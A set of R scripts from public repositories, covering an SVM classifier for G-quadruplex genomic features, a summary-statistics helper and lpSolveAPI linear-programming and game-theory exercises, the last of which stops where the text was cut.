rbind(test[test$lname=="Fortune",],train[train$lname=="Fortune",])
rbind(test[test$lname=="Panula",],train[train$lname=="Panula",])
rbind(test[test$lname=="Sage",],train[train$lname=="Sage",])
|
library(e1071)
library(caTools)
library(caret)
library(stats)
library(useful)
library(plyr)
library(doMC)
library(pROC)
library(data.table)
# global options
registerDoMC(detectCores()/2)
getDoParWorkers()
setwd("/home/cjls4/feature_vectors/")
#import data
load("collapsed_g4_positive.RData")
load("collapsed_g4_negative.RData")
load("test_collapsed_g4_positive.RData")
load("test_collapsed_g4_negative.RData")
#merge the +/- training sets
train_g4 <- rbind(collapsed_g4_positive, collapsed_g4_negative)
remove(collapsed_g4_positive)
remove(collapsed_g4_negative)
#merge the +/- test sets
test_g4 <-rbind(test_collapsed_g4_positive, test_collapsed_g4_negative)
remove(test_collapsed_g4_positive)
remove(test_collapsed_g4_negative)
##### radial kernel function #####
# Custom caret model specification: an SVM with an RBF kernel backed by
# e1071::svm(), tuning only the cost parameter (gamma is left at the
# e1071 default). Passed as `method = svmRadialE1071` to caret::train().
svmRadialE1071 <- list(
  label = "Support Vector Machines with Radial Kernel - e1071",
  library = "e1071",
  type = c("Regression", "Classification"),
  # The single tuning parameter exposed to caret's search
  parameters = data.frame(parameter="cost",
                          class="numeric",
                          label="Cost"),
  # Candidate cost values: powers of two for grid search,
  # log-uniform random draws for random search
  grid = function (x, y, len = NULL, search = "grid")
  {
    if (search == "grid") {
      out <- expand.grid(cost = 2^((1:len) - 3))
    }
    else {
      out <- data.frame(cost = 2^runif(len, min = -5, max = 10))
    }
    out
  },
  loop=NULL,
  # Fit one e1071 SVM; only forwards `probability = classProbs` when the
  # caller did not already pass `probability` and y is a factor
  fit=function (x, y, wts, param, lev, last, classProbs, ...)
  {
    if (any(names(list(...)) == "probability") | is.numeric(y)) {
      out <- e1071::svm(x = as.matrix(x), y = y, kernel = "radial",
                        cost = param$cost, ...)
    }
    else {
      out <- e1071::svm(x = as.matrix(x), y = y, kernel = "radial",
                        cost = param$cost, probability = classProbs, ...)
    }
    out
  },
  # Class / numeric predictions for new data
  predict = function (modelFit, newdata, submodels = NULL)
  {
    predict(modelFit, newdata)
  },
  # Class probabilities (requires the model fitted with probability=TRUE)
  prob = function (modelFit, newdata, submodels = NULL)
  {
    out <- predict(modelFit, newdata, probability = TRUE)
    attr(out, "probabilities")
  },
  # Names of the predictors used by a fitted model, with fallbacks
  predictors = function (x, ...)
  {
    out <- if (!is.null(x$terms))
      predictors.terms(x$terms)
    else x$xNames
    if (is.null(out))
      out <- names(attr(x, "scaling")$x.scale$`scaled:center`)
    if (is.null(out))
      out <- NA
    out
  },
  tags = c("Kernel Methods", "Support Vector Machines", "Regression", "Classifier", "Robust Methods"),
  levels = function(x) x$levels,
  # Order candidate models from least to most complex (lowest cost first)
  sort = function(x)
  {
    x[order(x$cost), ]
  }
)
#seperate G4 from the predictors
seg_train_g4 <- train_g4[,1:19]
seg_test_g4 <- test_g4[,1:19]
#preprocessing
transformations <- preProcess(train_g4,
method=c("YeoJohnson", "center", "scale", "corr"),
cutoff=0.75)
training_set <- predict(transformations, train_g4)
table(training_set[,20])
table(train_g4[,20])
class(training_set[,20])
training_set$G4 <- as.numeric(training_set$G4)
training_set$G4 <- as.factor(training_set$G4)
training_set$G4 <- as.numeric(training_set$G4)
training_set$G4 <- as.factor(training_set$G4) #yes this is convoluted, but it gets the job done
training_set$G4 <- revalue(training_set$G4, c("1"="A", "2"= "B"))
test_set <- predict(transformations, test_g4)
test_set$G4 <- as.numeric(test_set$G4)
test_set$G4 <- as.factor(test_set$G4)
test_set$G4 <- as.numeric(test_set$G4)
test_set$G4 <- as.factor(test_set$G4) #yes this is convoluted, but it gets the job done
test_set$G4 <- revalue(test_set$G4, c("1"="A", "2"= "B"))
#model cross-validation and tuning
set.seed(42)
seeds <- vector(mode = "list", length = 26)
for(i in 1:25) seeds[[i]] <- sample.int(1000, 9)
seeds[[26]] <- sample.int(1000,1)
# setting cross validation method, trying to tune cost
cvCtrl_probs <- trainControl(method = "repeatedcv",
repeats = 5,
number = 5,
summaryFunction = twoClassSummary,
classProbs = TRUE,
seeds=seeds)
cvCtrl <- trainControl(method = "repeatedcv",
repeats = 5,
number = 5,
summaryFunction = twoClassSummary,
classProbs = TRUE,
seeds=seeds)
# training data
svmTune <- train(x = training_set[,1:19],
y = training_set$G4,
method = svmRadialE1071,
tuneLength = 9,
metric = "ROC",
trControl = cvCtrl)
probs_svm <- train(x = training_set[,1:19],
y = training_set$G4,
method = svmRadialE1071,
tuneLength = 1,
metric = "ROC",
trControl = cvCtrl_probs,
probability = TRUE)
save(svmTune, file = "svmTune.RData")
save(probs_svm, file = "probs_svm.RData")
svmTune
svmTune$finalModel
plot(svmTune, metric = "ROC", scales = list(x = list(log =2)))
svmPred <- predict(svmTune, test_set[,1:19])
confusionMatrix(svmPred, as.factor(test_set$G4))
# Accuracy : 0.785
# 95% CI : (0.769, 0.8003)
# No Information Rate : 0.7772
# P-Value [Acc > NIR] : 0.1717
##### plot fun things #####
gridSize <- 150
v1limits <- c(min(test_set$R_loops),max(test_set$R_loops))
tmpV1 <- seq(v1limits[1],v1limits[2],len=gridSize)
v2limits <- c(min(test_set$GC), max(test_set$GC))
tmpV2 <- seq(v2limits[1],v2limits[2],len=gridSize)
xgrid <- expand.grid(tmpV1,tmpV2)
names(xgrid) <- names(training_set)[c(13, 19)]
V3 <- as.numeric(predict(svmTune, xgrid))
V3 <- predict(svmTune, xgrid)
xgrid <- cbind(xgrid, V3)
point_shapes <- c(15,17)
point_colours <- brewer.pal(3,"Dark2")
point_size = 2
trainClassNumeric <- ifelse(moonsTrain$V3=="A", 1, 2)
testClassNumeric <- ifelse(moonsTest$V3=="A", 1, 2)
ggplot(xgrid, aes(V1,V2)) +
geom_point(col=point_colours[V3], shape=16, size=0.3) +
geom_point(data=moonsTrain, aes(V1,V2), col=point_colours[trainClassNumeric],
shape=point_shapes[trainClassNumeric], size=point_size) +
geom_contour(data=xgrid, aes(x=V1, y=V2, z=V3), breaks=1.5, col="grey30") +
ggtitle("train") +
theme_bw() +
theme(plot.title = element_text(size=25, face="bold"), axis.text=element_text(size=15),
axis.title=element_text(size=20,face="bold"))
ggplot(xgrid, aes(V1,V2)) +
geom_point(col=point_colours[V3], shape=16, size=0.3) +
geom_point(data=moonsTest, aes(V1,V2), col=point_colours[testClassNumeric],
shape=point_shapes[testClassNumeric], size=point_size) +
geom_contour(data=xgrid, aes(x=V1, y=V2, z=V3), breaks=1.5, col="grey30") +
ggtitle("test") +
theme_bw() +
theme(plot.title = element_text(size=25, face="bold"), axis.text=element_text(size=15),
axis.title=element_text(size=20,face="bold"))
# might need to do dimension reduction etc. to visualise what is going on lol
#oh well. Here's another SVM
training_set[,1:4] = scale(training_set[,1:4])
test_set[,1:4] = scale(test_set[,1:4])
classifier1 = svm(formula = G4~., data = training_set, type = 'C-classification', kernel = 'radial')
classifier2 = svm(formula = G4~ R_loops + GC, data = training_set, type = 'C-classification', kernel = 'radial')
test_pred1 = predict(classifier1, type = 'response', newdata = test_set[,-20])
test_pred2 = predict(classifier2, type = 'response', newdata = test_set[,-20])
# Making Confusion Matrix
cm1 = base::table(unlist(test_set[,20]), test_pred1)
cm2 = table(unlist(test_set[,20]), test_pred2)
cm1 # Confusion Matrix for all parameters
cm2 # Confusion Matrix for parameters being R loops and GsC content
# Hard-class predictions from the tuned caret model on the test set
svmPred <- predict(svmTune, test_set[,1:19])
# Confusion matrices for the two directly-fitted e1071 classifiers
confusionMatrix(test_pred1, as.factor(test_set$G4))
confusionMatrix(test_pred2, as.factor(test_set$G4))
# BUG fix: `test_pred3` is never created anywhere in this script, so the
# original call confusionMatrix(test_pred3, ...) aborted with
# "object 'test_pred3' not found"; the call has been removed.
# The accuracy for both model looks solid...
m2 <- svm(Species~., data = iris)
plot(m2, iris, Petal.Width ~ Petal.Length,
slice = list(Sepal.Width = 3, Sepal.Length = 4))
plot(classifier1, training_set, R_loops ~ GC)
plot(classifier2, training_set, R_loops ~ GC)
iris.part = subset(iris, Species != 'setosa')
iris.part$Species = factor(iris.part$Species)
#iris.part = iris.part[, c(1,2,5)]
svm.fit = svm(formula=Species~., data=iris.part, type='C-classification', kernel='linear')
plot(svm.fit, iris.part, Petal.Width ~ Petal.Length, slice = list(Sepal.Width = 3, Sepal.Length = 4))
##### top 100 G4 scores #####
# get all the predicted scores, then get the top 100, and find it's equivalent expression score
load("svmTune.RData")
load("probs_svm.RData")
varImp(object = svmTune)
roc_svm_test <- roc(response = test_set$G4, predictor =as.numeric(svmPred))
plot(roc_svm_test)
plot(varImp(svmTune), col = viridis(19, direction = 1))
#simple_svm <- svm(x = training_set[,1:19],
# y = training_set$G4,
# kernel = "radial",
# cost = 0.25,
# cross = 5,
# probability = TRUE)
svmTune$finalModel
#pretty sure "B" is G4 positive
all_preds_svm <- predict.train(svmTune, type = "prob")
svmPred <- predict(svmTune, test_set[,1:19], type = "prob")
total_preds <- rbind(all_preds_svm, svmPred)
top_100_preds_svm <- S4Vectors::tail(as.data.table(sort(total_preds$B , decreasing = F, index.return = T)), 100)
load("min_g4_positive_names_train.RData")
load("min_g4_negative_names_train.RData")
load("plus_g4_positive_names_train.RData")
load("plus_g4_negative_names_train.RData")
load("min_g4_positive_names_test.RData")
load("min_g4_negative_names_test.RData")
load("plus_g4_positive_names_test.RData")
load("plus_g4_negative_names_test.RData")
x_names <- rbind(min_g4_positive_names_train, min_g4_negative_names_train,
plus_g4_positive_names_train, plus_g4_negative_names_train,
min_g4_positive_names_test, min_g4_negative_names_test,
plus_g4_positive_names_test, plus_g4_negative_names_test)
top_100_names_svm <- x_names[top_100_preds_svm$ix]
save(top_100_names_svm, file = "top_100_names_svm.RData")
| /Code/SVM_1.R | no_license | caroljlsun/sysbiol_pt3 | R | false | false | 10,045 | r |
library(e1071)
library(caTools)
library(caret)
library(stats)
library(useful)
library(plyr)
library(doMC)
library(pROC)
library(data.table)
# global options
registerDoMC(detectCores()/2)
getDoParWorkers()
setwd("/home/cjls4/feature_vectors/")
#import data
load("collapsed_g4_positive.RData")
load("collapsed_g4_negative.RData")
load("test_collapsed_g4_positive.RData")
load("test_collapsed_g4_negative.RData")
#merge the +/- training sets
train_g4 <- rbind(collapsed_g4_positive, collapsed_g4_negative)
remove(collapsed_g4_positive)
remove(collapsed_g4_negative)
#merge the +/- test sets
test_g4 <-rbind(test_collapsed_g4_positive, test_collapsed_g4_negative)
remove(test_collapsed_g4_positive)
remove(test_collapsed_g4_negative)
##### radial kernel function #####
svmRadialE1071 <- list(
label = "Support Vector Machines with Radial Kernel - e1071",
library = "e1071",
type = c("Regression", "Classification"),
parameters = data.frame(parameter="cost",
class="numeric",
label="Cost"),
grid = function (x, y, len = NULL, search = "grid")
{
if (search == "grid") {
out <- expand.grid(cost = 2^((1:len) - 3))
}
else {
out <- data.frame(cost = 2^runif(len, min = -5, max = 10))
}
out
},
loop=NULL,
fit=function (x, y, wts, param, lev, last, classProbs, ...)
{
if (any(names(list(...)) == "probability") | is.numeric(y)) {
out <- e1071::svm(x = as.matrix(x), y = y, kernel = "radial",
cost = param$cost, ...)
}
else {
out <- e1071::svm(x = as.matrix(x), y = y, kernel = "radial",
cost = param$cost, probability = classProbs, ...)
}
out
},
predict = function (modelFit, newdata, submodels = NULL)
{
predict(modelFit, newdata)
},
prob = function (modelFit, newdata, submodels = NULL)
{
out <- predict(modelFit, newdata, probability = TRUE)
attr(out, "probabilities")
},
predictors = function (x, ...)
{
out <- if (!is.null(x$terms))
predictors.terms(x$terms)
else x$xNames
if (is.null(out))
out <- names(attr(x, "scaling")$x.scale$`scaled:center`)
if (is.null(out))
out <- NA
out
},
tags = c("Kernel Methods", "Support Vector Machines", "Regression", "Classifier", "Robust Methods"),
levels = function(x) x$levels,
sort = function(x)
{
x[order(x$cost), ]
}
)
#seperate G4 from the predictors
seg_train_g4 <- train_g4[,1:19]
seg_test_g4 <- test_g4[,1:19]
#preprocessing
transformations <- preProcess(train_g4,
method=c("YeoJohnson", "center", "scale", "corr"),
cutoff=0.75)
training_set <- predict(transformations, train_g4)
table(training_set[,20])
table(train_g4[,20])
class(training_set[,20])
training_set$G4 <- as.numeric(training_set$G4)
training_set$G4 <- as.factor(training_set$G4)
training_set$G4 <- as.numeric(training_set$G4)
training_set$G4 <- as.factor(training_set$G4) #yes this is convoluted, but it gets the job done
training_set$G4 <- revalue(training_set$G4, c("1"="A", "2"= "B"))
test_set <- predict(transformations, test_g4)
test_set$G4 <- as.numeric(test_set$G4)
test_set$G4 <- as.factor(test_set$G4)
test_set$G4 <- as.numeric(test_set$G4)
test_set$G4 <- as.factor(test_set$G4) #yes this is convoluted, but it gets the job done
test_set$G4 <- revalue(test_set$G4, c("1"="A", "2"= "B"))
#model cross-validation and tuning
set.seed(42)
seeds <- vector(mode = "list", length = 26)
for(i in 1:25) seeds[[i]] <- sample.int(1000, 9)
seeds[[26]] <- sample.int(1000,1)
# setting cross validation method, trying to tune cost
cvCtrl_probs <- trainControl(method = "repeatedcv",
repeats = 5,
number = 5,
summaryFunction = twoClassSummary,
classProbs = TRUE,
seeds=seeds)
cvCtrl <- trainControl(method = "repeatedcv",
repeats = 5,
number = 5,
summaryFunction = twoClassSummary,
classProbs = TRUE,
seeds=seeds)
# training data
svmTune <- train(x = training_set[,1:19],
y = training_set$G4,
method = svmRadialE1071,
tuneLength = 9,
metric = "ROC",
trControl = cvCtrl)
probs_svm <- train(x = training_set[,1:19],
y = training_set$G4,
method = svmRadialE1071,
tuneLength = 1,
metric = "ROC",
trControl = cvCtrl_probs,
probability = TRUE)
save(svmTune, file = "svmTune.RData")
save(probs_svm, file = "probs_svm.RData")
svmTune
svmTune$finalModel
plot(svmTune, metric = "ROC", scales = list(x = list(log =2)))
svmPred <- predict(svmTune, test_set[,1:19])
confusionMatrix(svmPred, as.factor(test_set$G4))
# Accuracy : 0.785
# 95% CI : (0.769, 0.8003)
# No Information Rate : 0.7772
# P-Value [Acc > NIR] : 0.1717
##### plot fun things #####
gridSize <- 150
v1limits <- c(min(test_set$R_loops),max(test_set$R_loops))
tmpV1 <- seq(v1limits[1],v1limits[2],len=gridSize)
v2limits <- c(min(test_set$GC), max(test_set$GC))
tmpV2 <- seq(v2limits[1],v2limits[2],len=gridSize)
xgrid <- expand.grid(tmpV1,tmpV2)
names(xgrid) <- names(training_set)[c(13, 19)]
V3 <- as.numeric(predict(svmTune, xgrid))
V3 <- predict(svmTune, xgrid)
xgrid <- cbind(xgrid, V3)
point_shapes <- c(15,17)
point_colours <- brewer.pal(3,"Dark2")
point_size = 2
trainClassNumeric <- ifelse(moonsTrain$V3=="A", 1, 2)
testClassNumeric <- ifelse(moonsTest$V3=="A", 1, 2)
ggplot(xgrid, aes(V1,V2)) +
geom_point(col=point_colours[V3], shape=16, size=0.3) +
geom_point(data=moonsTrain, aes(V1,V2), col=point_colours[trainClassNumeric],
shape=point_shapes[trainClassNumeric], size=point_size) +
geom_contour(data=xgrid, aes(x=V1, y=V2, z=V3), breaks=1.5, col="grey30") +
ggtitle("train") +
theme_bw() +
theme(plot.title = element_text(size=25, face="bold"), axis.text=element_text(size=15),
axis.title=element_text(size=20,face="bold"))
ggplot(xgrid, aes(V1,V2)) +
geom_point(col=point_colours[V3], shape=16, size=0.3) +
geom_point(data=moonsTest, aes(V1,V2), col=point_colours[testClassNumeric],
shape=point_shapes[testClassNumeric], size=point_size) +
geom_contour(data=xgrid, aes(x=V1, y=V2, z=V3), breaks=1.5, col="grey30") +
ggtitle("test") +
theme_bw() +
theme(plot.title = element_text(size=25, face="bold"), axis.text=element_text(size=15),
axis.title=element_text(size=20,face="bold"))
# might need to do dimension reduction etc. to visualise what is going on lol
#oh well. Here's another SVM
training_set[,1:4] = scale(training_set[,1:4])
test_set[,1:4] = scale(test_set[,1:4])
classifier1 = svm(formula = G4~., data = training_set, type = 'C-classification', kernel = 'radial')
classifier2 = svm(formula = G4~ R_loops + GC, data = training_set, type = 'C-classification', kernel = 'radial')
test_pred1 = predict(classifier1, type = 'response', newdata = test_set[,-20])
test_pred2 = predict(classifier2, type = 'response', newdata = test_set[,-20])
# Making Confusion Matrix
cm1 = base::table(unlist(test_set[,20]), test_pred1)
cm2 = table(unlist(test_set[,20]), test_pred2)
cm1 # Confusion Matrix for all parameters
cm2 # Confusion Matrix for parameters being R loops and GsC content
# Hard-class predictions from the tuned caret model on the test set
svmPred <- predict(svmTune, test_set[,1:19])
# Confusion matrices for the two directly-fitted e1071 classifiers
confusionMatrix(test_pred1, as.factor(test_set$G4))
confusionMatrix(test_pred2, as.factor(test_set$G4))
# BUG fix: `test_pred3` is never created anywhere in this script, so the
# original call confusionMatrix(test_pred3, ...) aborted with
# "object 'test_pred3' not found"; the call has been removed.
# The accuracy for both model looks solid...
m2 <- svm(Species~., data = iris)
plot(m2, iris, Petal.Width ~ Petal.Length,
slice = list(Sepal.Width = 3, Sepal.Length = 4))
plot(classifier1, training_set, R_loops ~ GC)
plot(classifier2, training_set, R_loops ~ GC)
iris.part = subset(iris, Species != 'setosa')
iris.part$Species = factor(iris.part$Species)
#iris.part = iris.part[, c(1,2,5)]
svm.fit = svm(formula=Species~., data=iris.part, type='C-classification', kernel='linear')
plot(svm.fit, iris.part, Petal.Width ~ Petal.Length, slice = list(Sepal.Width = 3, Sepal.Length = 4))
##### top 100 G4 scores #####
# get all the predicted scores, then get the top 100, and find it's equivalent expression score
load("svmTune.RData")
load("probs_svm.RData")
varImp(object = svmTune)
roc_svm_test <- roc(response = test_set$G4, predictor =as.numeric(svmPred))
plot(roc_svm_test)
plot(varImp(svmTune), col = viridis(19, direction = 1))
#simple_svm <- svm(x = training_set[,1:19],
# y = training_set$G4,
# kernel = "radial",
# cost = 0.25,
# cross = 5,
# probability = TRUE)
svmTune$finalModel
#pretty sure "B" is G4 positive
all_preds_svm <- predict.train(svmTune, type = "prob")
svmPred <- predict(svmTune, test_set[,1:19], type = "prob")
total_preds <- rbind(all_preds_svm, svmPred)
top_100_preds_svm <- S4Vectors::tail(as.data.table(sort(total_preds$B , decreasing = F, index.return = T)), 100)
load("min_g4_positive_names_train.RData")
load("min_g4_negative_names_train.RData")
load("plus_g4_positive_names_train.RData")
load("plus_g4_negative_names_train.RData")
load("min_g4_positive_names_test.RData")
load("min_g4_negative_names_test.RData")
load("plus_g4_positive_names_test.RData")
load("plus_g4_negative_names_test.RData")
x_names <- rbind(min_g4_positive_names_train, min_g4_negative_names_train,
plus_g4_positive_names_train, plus_g4_negative_names_train,
min_g4_positive_names_test, min_g4_negative_names_test,
plus_g4_positive_names_test, plus_g4_negative_names_test)
top_100_names_svm <- x_names[top_100_preds_svm$ix]
save(top_100_names_svm, file = "top_100_names_svm.RData")
|
#' Calculate standard error, standard deviation, and confidence interval
#' Adapted from Cookbook for R
#'
#' @param data data.frame you want to summarise
#' @param measurevar name (string) of the column to measure
#' @param groupvars A list of variables you want to use to group the data, those will also be kept in the output
#' @param na.rm Whether remove NAs or not
#' @param conf.interval Confidence level of the final ci column
#' @return A new data.frame with columns: groupvars, measurevar (mean), N, sd, se, and ci
#' @export
summarySE <- function(data=NULL, measurevar, groupvars=NULL, na.rm=FALSE, conf.interval=.95) {
  # Fail fast if doBy is missing; require() would only warn and return
  # FALSE, letting the function die later with a confusing error, and
  # would attach doBy to the search path as a side effect.
  if (!requireNamespace("doBy", quietly = TRUE)) {
    stop("summarySE() requires the 'doBy' package", call. = FALSE)
  }
  # length() variant that skips NA's when na.rm == TRUE
  length2 <- function (x, na.rm=FALSE) {
    if (na.rm) sum(!is.na(x))
    else length(x)
  }
  # Collapse the data: measurevar ~ group1 + group2 + ...
  formula <- as.formula(paste(measurevar, paste(groupvars, collapse=" + "), sep=" ~ "))
  datac <- doBy::summaryBy(formula, data=data, FUN=c(length2,mean,sd), na.rm=na.rm)
  # Rename the columns summaryBy generated to friendlier names
  names(datac)[ names(datac) == paste(measurevar, ".mean", sep="") ] <- measurevar
  names(datac)[ names(datac) == paste(measurevar, ".sd", sep="") ] <- "sd"
  names(datac)[ names(datac) == paste(measurevar, ".length2", sep="") ] <- "N"
  datac$se <- datac$sd / sqrt(datac$N)  # Calculate standard error of the mean
  # Confidence interval multiplier for standard error:
  # t-statistic for the requested level, e.g. .95 -> qt(.975, df=N-1)
  ciMult <- qt(conf.interval/2 + .5, datac$N-1)
  datac$ci <- datac$se * ciMult
  return(datac)
}
| /R/summarySE.R | permissive | bxshi/rdsg | R | false | false | 1,652 | r | #' Calculate standard error, standard deviation, and confidence interval
#' Steal from Cookbook for R
#'
#' @param data data.frame you want to calculate
#' @param measurevar colname you want to measure
#' @param groupvars A list of variables you want to use to group the data, those will also be kept in the output
#' @param na.rm Whether remove NAs or not
#' @param conf.interval Confidence interval of final ci column
#' @return A new data.frame with columns: groupvars, measurevar, counts of each group, sd, se, and ci
#' @export
summarySE <- function(data=NULL, measurevar, groupvars=NULL, na.rm=FALSE, conf.interval=.95) {
require(doBy)
# New version of length which can handle NA's: if na.rm==T, don't count them
length2 <- function (x, na.rm=FALSE) {
if (na.rm) sum(!is.na(x))
else length(x)
}
# Collapse the data
formula <- as.formula(paste(measurevar, paste(groupvars, collapse=" + "), sep=" ~ "))
datac <- summaryBy(formula, data=data, FUN=c(length2,mean,sd), na.rm=na.rm)
# Rename columns
names(datac)[ names(datac) == paste(measurevar, ".mean", sep="") ] <- measurevar
names(datac)[ names(datac) == paste(measurevar, ".sd", sep="") ] <- "sd"
names(datac)[ names(datac) == paste(measurevar, ".length2", sep="") ] <- "N"
datac$se <- datac$sd / sqrt(datac$N) # Calculate standard error of the mean
# Confidence interval multiplier for standard error
# Calculate t-statistic for confidence interval:
# e.g., if conf.interval is .95, use .975 (above/below), and use df=N-1
ciMult <- qt(conf.interval/2 + .5, datac$N-1)
datac$ci <- datac$se * ciMult
return(datac)
}
|
#-------------Question 2------------------#
# Linear program over 9 decision variables (three groups of three,
# presumably three products across three facilities — confirm against
# the assignment text), maximising total profit.
library(lpSolveAPI)
Y <- make.lp(0, 9)
lp.control(Y, sense= "maximize")
# Per-unit profit coefficients of the 9 variables
set.objfn(Y, c(25, 10, 5, 21, 6, 1, 25, 10, 5))
# Capacity limit for each group of three variables
add.constraint(Y, c(1,1,1,0,0,0,0,0,0), "<=", 4800)
add.constraint(Y, c(0,0,0,1,1,1,0,0,0), "<=", 3000)
add.constraint(Y, c(0,0,0,0,0,0,1,1,1), "<=", 3500)
# Mix/share constraints inside each group (e.g. the first variable must
# be at least 55% of its group's total, etc.)
add.constraint(Y, c(0.45,-0.55,-0.55,0,0,0,0,0,0),">=",0)
add.constraint(Y, c(-0.3,0.7,-0.3,0,0,0,0,0,0),">=",0)
add.constraint(Y, c(0,0,0,0.55,-0.45,-0.45,0,0,0),">=",0)
add.constraint(Y, c(0,0,0,-0.4,0.6,-0.4,0,0,0),">=",0)
add.constraint(Y, c(0,0,0,0,0,0,0.7,-0.3,-0.3),">=",0)
add.constraint(Y, c(0,0,0,0,0,0,-0.5,0.5,-0.5),">=",0)
#LINEAR PROGRAMMING model Results:
Row_Names <- c("R1", "R2", "R3", "R4", "R5", "R6", "R7", "R8", "R9")
Col_Names <- c("C1", "C2", "C3", "C4", "C5", "C6", "C7", "C8", "C9")
dimnames(Y) <- list(Row_Names, Col_Names)
solve(Y)              # 0 means an optimal solution was found
get.objective(Y)      # optimal objective value
get.variables(Y)      # optimal decision-variable values
get.constraints(Y)    # constraint LHS values at the optimum
#---------question 3------------#
#player 1
model_LP <- make.lp(0, 8)
lp.control(model_LP, sense= "maximize")
set.objfn(model_LP, c(0,0,0,0,0,0,0,1))
add.constraint(model_LP, c(-1,-2,-1,0,-1,-2,-1,1), "<=", 0)
add.constraint(model_LP, c(0,-1,-2,-2,-2,-1,0,1), "<=", 0)
add.constraint(model_LP, c(0,0,-2,-4,-2,0,0,1), "<=", 0)
add.constraint(model_LP, c(0,-1,-2,-2,-2,1,0,1), "<=", 0)
add.constraint(model_LP, c(-1,-2,-1,0,-1,-2,-1,1), "<=", 0)
add.constraint(model_LP, c(1,1,1,1,1,1,1,0), "=", 1)
set.bounds(model_LP, lower = c(0, 0, 0,0,0,0,0, -Inf))
Row_Names <- c("R1", "R2", "R3", "R4", "R5", "R6")
Col_Names <- c("C1", "C2", "C3", "C4", "C5", "C6", "C7","v")
dimnames(model_LP) <- list(Row_Names, Col_Names)
solve(model_LP)
model_LP
get.objective(model_LP)
get.variables(model_LP)
get.constraints(model_LP)
# For Player2
x <- make.lp(0, 6)
lp.control(x, sense= "minimize")
set.objfn(x, c(0, 0, 0,0,0, 1))
add.constraint(x, c(-1, 0,0,0,-1, 1), ">=",0)
add.constraint(x, c(-2, -1,0,-1,-2, 1), ">=",0)
add.constraint(x, c(-1, -2,-2,-2,-1, 1), ">=",0)
add.constraint(x, c(0, -2,-4,-2,0, 1), ">=",0)
add.constraint(x, c(-1, -2,-2,-2,-1, 1), ">=",0)
add.constraint(x, c(-2, -1,0,-1,-2, 1), ">=",0)
add.constraint(x, c(-1, 0,0,0,-1, 1), ">=",0)
add.constraint(x, c(1,1,1,1,1,0), "=", 1)
set.bounds(x, lower = c(0, 0, 0,0,0, -Inf))
Row_Names <- c("R1", "R2", "R3", "R4", "R5", "R6", "R7", "R8")
Col_Names <- c("c1", "c2", "c3", "c4", "c5","v")
dimnames(x) <- list(Row_Names, Col_Names)
solve(x)
x
get.objective(x)
get.variables(x)
get.constraints(x)
| /Model prediction.R | no_license | naveen96c/R-Programming | R | false | false | 2,501 | r | #-------------Question 2------------------#
# Resource-allocation LP over 9 decision variables, solved with lpSolveAPI.
library(lpSolveAPI)
# Empty maximisation model: 0 constraints to start, 9 variables.
Y <- make.lp(0, 9)
lp.control(Y, sense= "maximize")
# Objective coefficients for the 9 variables.
set.objfn(Y, c(25, 10, 5, 21, 6, 1, 25, 10, 5))
# Capacity constraints: each disjoint block of three variables shares one limit.
add.constraint(Y, c(1,1,1,0,0,0,0,0,0), "<=", 4800)
add.constraint(Y, c(0,0,0,1,1,1,0,0,0), "<=", 3000)
add.constraint(Y, c(0,0,0,0,0,0,1,1,1), "<=", 3500)
# Share constraints within each block: e.g. 0.45*x1 - 0.55*x2 - 0.55*x3 >= 0
# is algebraically x1 >= 0.55*(x1 + x2 + x3), a lower bound on x1's share.
add.constraint(Y, c(0.45,-0.55,-0.55,0,0,0,0,0,0),">=",0)
add.constraint(Y, c(-0.3,0.7,-0.3,0,0,0,0,0,0),">=",0)
add.constraint(Y, c(0,0,0,0.55,-0.45,-0.45,0,0,0),">=",0)
add.constraint(Y, c(0,0,0,-0.4,0.6,-0.4,0,0,0),">=",0)
add.constraint(Y, c(0,0,0,0,0,0,0.7,-0.3,-0.3),">=",0)
add.constraint(Y, c(0,0,0,0,0,0,-0.5,0.5,-0.5),">=",0)
#LINEAR PROGRAMMING model Results:
Row_Names <- c("R1", "R2", "R3", "R4", "R5", "R6", "R7", "R8", "R9")
Col_Names <- c("C1", "C2", "C3", "C4", "C5", "C6", "C7", "C8", "C9")
dimnames(Y) <- list(Row_Names, Col_Names)
# Solve and report (solve() returns 0 when an optimal solution is found).
solve(Y)
get.objective(Y)
get.variables(Y)
get.constraints(Y)
#---------question 3------------#
#player 1
# Zero-sum game LP (row player): variables 1-7 are the mixed-strategy
# probabilities, variable 8 is v, the game value, which is maximised.
model_LP <- make.lp(0, 8)
lp.control(model_LP, sense= "maximize")
set.objfn(model_LP, c(0,0,0,0,0,0,0,1))
# Each row encodes v <= expected payoff against one opposing pure strategy
# (payoffs appear negated, with +1 on v, under "<=" 0).  Note that rows 1
# and 5 carry identical coefficients.
add.constraint(model_LP, c(-1,-2,-1,0,-1,-2,-1,1), "<=", 0)
add.constraint(model_LP, c(0,-1,-2,-2,-2,-1,0,1), "<=", 0)
add.constraint(model_LP, c(0,0,-2,-4,-2,0,0,1), "<=", 0)
add.constraint(model_LP, c(0,-1,-2,-2,-2,1,0,1), "<=", 0)
add.constraint(model_LP, c(-1,-2,-1,0,-1,-2,-1,1), "<=", 0)
# The strategy probabilities must sum to one.
add.constraint(model_LP, c(1,1,1,1,1,1,1,0), "=", 1)
# Probabilities are non-negative; v is free (may be negative).
set.bounds(model_LP, lower = c(0, 0, 0,0,0,0,0, -Inf))
Row_Names <- c("R1", "R2", "R3", "R4", "R5", "R6")
Col_Names <- c("C1", "C2", "C3", "C4", "C5", "C6", "C7","v")
dimnames(model_LP) <- list(Row_Names, Col_Names)
solve(model_LP)
model_LP
get.objective(model_LP)
get.variables(model_LP)
get.constraints(model_LP)
# For Player2
# Opposite-side game LP (column player): variables 1-5 are strategy
# probabilities, variable 6 is v, minimised; each row encodes
# v >= expected loss against one of the opponent's pure strategies.
x <- make.lp(0, 6)
lp.control(x, sense= "minimize")
set.objfn(x, c(0, 0, 0,0,0, 1))
add.constraint(x, c(-1, 0,0,0,-1, 1), ">=",0)
add.constraint(x, c(-2, -1,0,-1,-2, 1), ">=",0)
add.constraint(x, c(-1, -2,-2,-2,-1, 1), ">=",0)
add.constraint(x, c(0, -2,-4,-2,0, 1), ">=",0)
add.constraint(x, c(-1, -2,-2,-2,-1, 1), ">=",0)
add.constraint(x, c(-2, -1,0,-1,-2, 1), ">=",0)
add.constraint(x, c(-1, 0,0,0,-1, 1), ">=",0)
# Probabilities sum to one; v is freed by the bounds below.
add.constraint(x, c(1,1,1,1,1,0), "=", 1)
set.bounds(x, lower = c(0, 0, 0,0,0, -Inf))
Row_Names <- c("R1", "R2", "R3", "R4", "R5", "R6", "R7", "R8")
Col_Names <- c("c1", "c2", "c3", "c4", "c5","v")
dimnames(x) <- list(Row_Names, Col_Names)
solve(x)
x
